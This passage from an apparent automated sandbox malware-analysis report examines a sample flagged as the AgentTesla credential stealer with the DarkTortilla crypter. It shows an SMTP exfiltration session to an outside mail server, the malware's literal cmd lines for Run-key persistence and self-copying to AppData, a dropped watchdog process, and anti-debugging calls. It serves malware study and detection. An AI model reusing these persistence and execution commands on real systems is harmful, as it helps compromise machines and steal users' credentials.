                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 8b2968f1288c4235-EWR
                                                      2024-08-13 14:31:38 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                      Data Ascii: 8.46.123.33


                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Aug 13, 2024 16:31:41.442847013 CEST5874972980.96.42.133192.168.2.6220-evdanco.ro ESMTP Exim 4.97.1 #2 Tue, 13 Aug 2024 17:31:41 +0300
                                                      220- We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Aug 13, 2024 16:31:41.443054914 CEST49729587192.168.2.680.96.42.133EHLO 648351
                                                      Aug 13, 2024 16:31:41.662904024 CEST5874972980.96.42.133192.168.2.6250-evdanco.ro Hello 648351 [8.46.123.33]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Aug 13, 2024 16:31:44.249110937 CEST49729587192.168.2.680.96.42.133STARTTLS
                                                      Aug 13, 2024 16:31:44.472996950 CEST5874972980.96.42.133192.168.2.6220 TLS go ahead

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:10:29:35
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\Desktop\image.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\image.exe"
                                                      Imagebase:0x40000
                                                      File size:2'652'672 bytes
                                                      MD5 hash:043B9D0DE6BAD8FC4B4722987348329E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2378327661.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:10:29:41
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:10:29:41
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:10:29:41
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 16
                                                      Imagebase:0xe30000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:10:29:51
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:10:29:51
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:10:29:51
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 28
                                                      Imagebase:0xe30000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:10:29:56
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
                                                      Imagebase:0x4d0000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:10:30:19
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\SysWOW64\PING.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:ping 127.0.0.1 -n 28
                                                      Imagebase:0xe30000
                                                      File size:18'944 bytes
                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:10:30:46
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\AppData\Roaming\ACID.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Roaming\ACID.exe"
                                                      Imagebase:0x710000
                                                      File size:2'652'672 bytes
                                                      MD5 hash:043B9D0DE6BAD8FC4B4722987348329E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3447289746.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000F.00000002.3447289746.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:16
                                                      Start time:10:31:03
                                                      Start date:13/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                      Imagebase:0xdd0000
                                                      File size:42'064 bytes
                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:18
                                                      Start time:10:31:39
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\watchdog.exe"
                                                      Imagebase:0x190000
                                                      File size:78'336 bytes
                                                      MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 83%, ReversingLabs
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:10:31:39
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\watchdog.exe"
                                                      Imagebase:0xae0000
                                                      File size:78'336 bytes
                                                      MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:16.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:2.2%
                                                        Total number of Nodes:139
                                                        Total number of Limit Nodes:7
                                                        execution_graph 74377 98aa798 74378 98aa7de GetCurrentProcess 74377->74378 74380 98aa829 74378->74380 74381 98aa830 GetCurrentThread 74378->74381 74380->74381 74382 98aa86d GetCurrentProcess 74381->74382 74383 98aa866 74381->74383 74384 98aa8a3 74382->74384 74383->74382 74385 98aa8cb GetCurrentThreadId 74384->74385 74386 98aa8fc 74385->74386 74401 98aade8 DuplicateHandle 74402 98aae7e 74401->74402 74403 5126a20 74404 5126a32 74403->74404 74409 5127560 74404->74409 74412 5127568 74404->74412 74415 512c2cc 74404->74415 74419 512c230 74404->74419 74410 51275ac CheckRemoteDebuggerPresent 74409->74410 74411 51275ee 74410->74411 74411->74404 74413 51275ac CheckRemoteDebuggerPresent 74412->74413 74414 51275ee 74413->74414 74414->74404 74416 512c28a OutputDebugStringW 74415->74416 74417 512c2da 74415->74417 74418 512c2af 74416->74418 74418->74404 74420 512c276 OutputDebugStringW 74419->74420 74422 512c2af 74420->74422 74422->74404 74387 b2f7db8 74388 b2f7f43 74387->74388 74389 b2f7dde 74387->74389 74389->74388 74392 b2f8031 74389->74392 74395 b2f8038 PostMessageW 74389->74395 74393 b2f8038 PostMessageW 74392->74393 74394 b2f80a4 74393->74394 74394->74389 74396 b2f80a4 74395->74396 74396->74389 74334 98a1043 74336 98a1053 74334->74336 74335 98a19de 74338 4bdbae0 GetCurrentThreadId 74335->74338 74339 4bdbad0 GetCurrentThreadId 74335->74339 74336->74335 74337 98a1e6c 74336->74337 74342 4bdbad0 74336->74342 74353 4bdbae0 74336->74353 74338->74337 74339->74337 74344 4bdbaf5 74342->74344 74343 4bdbb7b 74351 4bdbae0 GetCurrentThreadId 74343->74351 74352 4bdbad0 GetCurrentThreadId 74343->74352 74344->74343 74346 4bdbbb0 74344->74346 74345 4bdbb85 74345->74336 74350 4bdbcb4 74346->74350 74364 4bda4bc 74346->74364 74349 4bda4bc GetCurrentThreadId 74349->74350 74350->74336 74351->74345 74352->74345 74355 4bdbaf5 74353->74355 74354 4bdbb7b 74362 4bdbae0 GetCurrentThreadId 74354->74362 74363 4bdbad0 GetCurrentThreadId 74354->74363 74355->74354 74357 4bdbbb0 74355->74357 74356 4bdbb85 74356->74336 74358 4bda4bc GetCurrentThreadId 74357->74358 74361 4bdbcb4 74357->74361 74359 4bdbcd8 74358->74359 74360 4bda4bc GetCurrentThreadId 74359->74360 74360->74361 74361->74336 74362->74356 74363->74356 74365 4bda4c7 74364->74365 74366 4bdbfff GetCurrentThreadId 74365->74366 74367 4bdbcd8 74365->74367 74366->74367 74367->74349 74368 9728738 74369 972877e DeleteFileW 74368->74369 74371 97287b7 74369->74371 74372 98a0040 74374 98a006c 74372->74374 74373 98a0dab 74374->74373 74375 4bdbae0 GetCurrentThreadId 74374->74375 74376 4bdbad0 GetCurrentThreadId 74374->74376 74375->74374 74376->74374 74397 98aee10 74398 98aee78 CreateWindowExW 74397->74398 74400 98aef34 74398->74400 74423 98a82f0 74424 98a82ff 74423->74424 74427 98a87ac 74423->74427 74435 98a87f0 74423->74435 74428 98a875c 74427->74428 74428->74427 74429 98a8824 74428->74429 74443 98a8a88 74428->74443 74447 98a8a78 74428->74447 74429->74424 74430 98a881c 74430->74429 74431 98a8a28 GetModuleHandleW 74430->74431 74432 98a8a55 74431->74432 74432->74424 74436 98a8801 74435->74436 74437 98a8824 74435->74437 74436->74437 74441 98a8a88 LoadLibraryExW 74436->74441 74442 98a8a78 LoadLibraryExW 74436->74442 74437->74424 74438 98a8a28 GetModuleHandleW 74440 98a8a55 74438->74440 74439 98a881c 74439->74437 74439->74438 74440->74424 74441->74439 74442->74439 74444 98a8a9c 74443->74444 74446 98a8ac1 74444->74446 74451 98a8418 74444->74451 74446->74430 74448 98a8a9c 74447->74448 74449 98a8418 LoadLibraryExW 74448->74449 74450 98a8ac1 74448->74450 74449->74450 74450->74430 74452 98a8c68 LoadLibraryExW 74451->74452 74454 98a8ce1 74452->74454 74454->74446 74455 10ed0f0 74457 10ed108 74455->74457 74456 10ed162 74457->74456 74462 98aefc8 74457->74462 74466 98afd19 74457->74466 74471 98ad174 74457->74471 74476 98aefb8 74457->74476 74463 98aefee 74462->74463 74464 98ad174 2 API calls 74463->74464 74465 98af00f 74464->74465 74465->74456 74467 98afd55 74466->74467 74468 98afd87 74467->74468 74480 98afea0 74467->74480 74484 98afeb0 74467->74484 74472 98ad17f 74471->74472 74473 98afd87 74472->74473 74474 98afea0 2 API calls 74472->74474 74475 98afeb0 2 API calls 74472->74475 74474->74473 74475->74473 74477 98aefee 74476->74477 74478 98ad174 2 API calls 74477->74478 74479 98af00f 74478->74479 74479->74456 74482 98afec4 74480->74482 74481 98aff50 74481->74468 74488 98aff68 74482->74488 74486 98afec4 74484->74486 74485 98aff50 74485->74468 74487 98aff68 2 API calls 74486->74487 74487->74485 74489 98aff79 74488->74489 74491 512f480 74488->74491 74489->74481 74495 512f4b0 74491->74495 74499 512f4a1 74491->74499 74492 512f49a 74492->74489 74496 512f4f2 74495->74496 74498 512f4f9 74495->74498 74497 512f54a CallWindowProcW 74496->74497 74496->74498 74497->74498 74498->74492 74500 512f4f2 74499->74500 74502 512f4f9 74499->74502 74501 512f54a CallWindowProcW 74500->74501 74500->74502 74501->74502 74502->74492

                                                        Executed Functions

                                                        Function 09AF0A94 Relevance: 5.6, Instructions: 5560COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 44 9af0a94-9af0ab2 45 9af0abd-9af0d08 44->45 46 9af0ab4-9af0abc 44->46 75 9af0d0e-9af1a35 45->75 76 9af2c7b-9af2f60 45->76 46->45 482 9af1a3b-9af1cff 75->482 483 9af1d07-9af2c73 75->483 151 9af3ec7-9af4ec0 76->151 152 9af2f66-9af3ebf 76->152 717 9af51b6-9af51c9 151->717 718 9af4ec6-9af51ae 151->718 152->151 482->483 483->76 723 9af51cf-9af5828 717->723 724 9af5830-9af67a8 717->724 718->717 723->724 1107 9af67a8 call 9af7d5f 724->1107 1108 9af67a8 call 9af7d33 724->1108 1109 9af67a8 call 9af7dc0 724->1109 1106 9af67ae-9af67b5 1107->1106 1108->1106 1109->1106
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b4e640821fdb1733d65b812ec9c88899a72ec158acd2ea69d099ee0d0351436
                                                        • Instruction ID: 22732a399b99bec0cc16910798792809414c541dbff2cf81e2b098a5b0a4aa0c
                                                        • Opcode Fuzzy Hash: 7b4e640821fdb1733d65b812ec9c88899a72ec158acd2ea69d099ee0d0351436
                                                        • Instruction Fuzzy Hash: 62B3F771A122188FDB68EF79D99466CBBF2FB88700F0084E9D44DA7754DA345E89CF42
                                                        Function 09AF0AB8 Relevance: 5.5, Instructions: 5545COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1110 9af0ab8-9af0d08 1140 9af0d0e-9af1a35 1110->1140 1141 9af2c7b-9af2f60 1110->1141 1547 9af1a3b-9af1cff 1140->1547 1548 9af1d07-9af2c73 1140->1548 1216 9af3ec7-9af4ec0 1141->1216 1217 9af2f66-9af3ebf 1141->1217 1782 9af51b6-9af51c9 1216->1782 1783 9af4ec6-9af51ae 1216->1783 1217->1216 1547->1548 1548->1141 1788 9af51cf-9af5828 1782->1788 1789 9af5830-9af67a8 1782->1789 1783->1782 1788->1789 2172 9af67a8 call 9af7d5f 1789->2172 2173 9af67a8 call 9af7d33 1789->2173 2174 9af67a8 call 9af7dc0 1789->2174 2171 9af67ae-9af67b5 2172->2171 2173->2171 2174->2171
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cab89edb164148dd45db8dcbf1f5bc67062c4af955b7a4d018848ed82a0e2812
                                                        • Instruction ID: a1fff5ae6d18f2f74fb1f4d427f110a95dfd25756221fb6cf0e49f6df8a4848d
                                                        • Opcode Fuzzy Hash: cab89edb164148dd45db8dcbf1f5bc67062c4af955b7a4d018848ed82a0e2812
                                                        • Instruction Fuzzy Hash: BEB3F771A122188FDB68EF79D99466CBBF2FB88700F0084E9D44DA7754DA345E89CF42
                                                        Function 09720A38 Relevance: 5.2, Instructions: 5226COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3127 9720a38-97261cd call 9727a67 4075 97261d3-97261da 3127->4075
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a33769bc222575f5f5a9f65b27cee073930c46283bf6851d4ac5beb760b262d
                                                        • Instruction ID: f8fcdd54d5c88db42828421f18570c56c5e7a79e1533b7d2fba04c4aba0b2b55
                                                        • Opcode Fuzzy Hash: 0a33769bc222575f5f5a9f65b27cee073930c46283bf6851d4ac5beb760b262d
                                                        • Instruction Fuzzy Hash: 36B3FA71A11659CBCB68EF39D99466CBBF2FB88700F0085EAD488A7354DE345E89CF41
                                                        Function 051276E1 Relevance: 3.9, Instructions: 3881COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4077 51276e1-512ae75 4654 512ae77-512ae7e 4077->4654 4655 512ae85-512af29 4077->4655 4654->4655 4664 512b0ca-512b182 4655->4664 4665 512af2f-512af4e 4655->4665 4690 512b188-512b265 4664->4690 4691 512b6de-512b834 4664->4691 4669 512af54-512b003 4665->4669 4670 512b00a-512b0c4 4665->4670 4669->4670 4670->4664 4670->4665 4715 512b5f2-512b6d8 4690->4715 4716 512b26b-512b302 4690->4716 4752 512b83e-512b85b 4691->4752 4715->4690 4715->4691 4741 512b30c-512b334 4716->4741 4747 512b33b-512b348 4741->4747 4750 512b3b7-512b454 4747->4750 4751 512b34a-512b36b 4747->4751 4769 512b457-512b459 4750->4769 4751->4750 4760 512b36d-512b38e 4751->4760 4752->4655 4760->4750 4768 512b390-512b3b1 4760->4768 4768->4750 4768->4769 4771 512b543-512b5ec 4769->4771 4772 512b45f-512b46a 4769->4772 4771->4715 4771->4716 4772->4771
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01f23488becac01926d5e4a4e98742a81c68799958ab89a521c424fc646ec06f
                                                        • Instruction ID: d375f3be4b5eed98bc9773910e3d5cb5df7fd1434e8c2e62361a5637d17127fc
                                                        • Opcode Fuzzy Hash: 01f23488becac01926d5e4a4e98742a81c68799958ab89a521c424fc646ec06f
                                                        • Instruction Fuzzy Hash: 03735670A26619CBD758EF39DD8966EBBB5FB88300F4085A9D048A3344DF34AE94CF51
                                                        Function 0B2F4066 Relevance: 3.0, Instructions: 3039COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4806 b2f4066-b2f4072 4807 b2f4073-b2f407c 4806->4807 4808 b2f437e-b2f43d4 4807->4808 4809 b2f407d-b2f4099 4807->4809 4812 b2f43d6-b2f43e2 call b2f449b 4808->4812 4813 b2f4402-b2f4414 4808->4813 4814 b2f409f 4809->4814 4815 b2f426d-b2f4340 4809->4815 4823 b2f43e4-b2f43ed 4812->4823 4817 b2f4417-b2f441d 4813->4817 4819 b2f40a6-b2f4250 4814->4819 4873 b2f4379 4815->4873 4874 b2f4342-b2f4353 4815->4874 4822 b2f441e-b2f4428 4817->4822 4819->4815 4906 b2f4252-b2f425a 4819->4906 4825 b2f442a-b2f442c 4822->4825 4823->4823 4826 b2f43ef-b2f43ff 4823->4826 4828 b2f445e-b2f446c 4825->4828 4829 b2f442e-b2f443b 4825->4829 4826->4813 4833 b2f446d-b2f447e 4828->4833 4834 b2f449b 4828->4834 4831 b2f443d 4829->4831 4832 b2f4480-b2f457d 4829->4832 4831->4825 4836 b2f443f-b2f4454 4831->4836 4868 b2f457f-b2f458a 4832->4868 4869 b2f4591-b2f4926 4832->4869 4833->4832 4836->4833 4839 b2f4456-b2f445c 4836->4839 4839->4828 4868->4869 4943 b2f492c-b2f6d7b 4869->4943 4944 b2f76d7-b2f76dc 4869->4944 4873->4808 4874->4807 4877 b2f4359-b2f436a call b2f6d7c 4874->4877 4885 b2f4371-b2f4378 4877->4885 4906->4815 4943->4944 4947 b2f76dd-b2f76e9 4944->4947 4947->4947 4949 b2f76eb-b2f770e 4947->4949 4950 b2f7750-b2f777e 4949->4950 4951 b2f7710-b2f773b 4949->4951 4953 b2f77c0-b2f77d2 4950->4953 4954 b2f7780-b2f779e 4950->4954 4951->4950 4955 b2f77e0-b2f7805 4953->4955 4954->4955 4958 b2f77a0-b2f77b2 4954->4958 4959 b2f77b4-b2f77bd 4958->4959 4959->4959 4961 b2f77bf 4959->4961 4961->4953
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ec995228550f4320e9d655f7436b71b0e82b24c10dace330197ac980038a5a0
                                                        • Instruction ID: 650993647c0e08b7945d2596fe1798356a3e399a59eb27e7e3fddf7a7e7213d7
                                                        • Opcode Fuzzy Hash: 5ec995228550f4320e9d655f7436b71b0e82b24c10dace330197ac980038a5a0
                                                        • Instruction Fuzzy Hash: 2A438B70A12219CBCB14FF7AED886ADBBF1FB88710F4085A9D048A7354DE349E94CB55
                                                        Function 051208C9 Relevance: 2.2, Instructions: 2224COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
